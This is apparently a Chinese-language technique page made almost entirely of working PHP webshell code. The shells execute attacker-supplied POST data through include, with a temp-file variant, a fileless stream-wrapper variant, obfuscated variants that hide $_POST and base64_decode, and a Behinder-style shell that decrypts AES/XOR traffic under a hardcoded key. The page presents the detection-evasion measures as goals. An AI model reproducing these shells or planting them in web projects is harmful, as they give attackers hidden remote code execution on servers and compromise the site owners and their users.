写文件include
1 2 3 4
| <?php (~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('temp.php','<?php '.$_POST[a].' ?>');include('temp.php'); ?>
|
1 2 3 4 5 6 7
| <?php $file = fopen("temp.php","w"); echo fwrite($file,"<?php ".$_POST[a].' ?>'); fclose($file); include('temp.php'); ?>
|
无文件落地include
通用蚁剑菜刀等
使用自定义协议将传入字符串当作文件include,无需写入文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| $user="<?php ".$_POST[a].' ?>'; class VStream { private $string; private $position; public function stream_open($path, $mode, $options, &$opened_path) { $url = parse_url($path); $id = $url["host"]; global $$id; $this->string = $$id; $this->position = 0; return true; } public function stream_read($count) { $ret = substr($this->string, $this->position, $count); $this->position += strlen($ret); return $ret; } public function stream_eof() {} public function stream_stat() {} } stream_wrapper_register("var", "VStream"); include("var://user"); ?>
|
进一步去除post特征并将流量b64编码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
| <?php function AtgI(){ $_1='_'.chr(51^99).chr(93^18).chr(70^21).chr(39^115); return $_1; } $params = strrev(edoced_46esab)(${AtgI()}[a]); $user="<?php ".$params.' ?>'; class VStream { private $string; private $position; public function stream_open($path, $mode, $options, &$opened_path) { $url = parse_url($path); $id = $url["host"]; global $$id; $this->string = $$id; $this->position = 0; return true; } public function stream_read($count) { $ret = substr($this->string, $this->position, $count); $this->position += strlen($ret); return $ret; } public function stream_eof() {} public function stream_stat() {} } stream_wrapper_register("var", "VStream"); include("var://user"); ?>
|
behinder
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
| <?php @error_reporting(0); session_start(); $key="dd42f170a6074880"; $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post."");
for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1];
$user='<?php @'.$params; class VStream { private $string; private $position; public function stream_open($path, $mode, $options, &$opened_path) { $url = parse_url($path); $id = $url["host"]; global $$id; $this->string = $$id; $this->position = 0; return true; } public function stream_read($count) { $ret = substr($this->string, $this->position, $count); $this->position += strlen($ret); return $ret; } public function stream_eof() {} public function stream_stat() {} } stream_wrapper_register("var", "VStream"); include("var://user"); ?>
|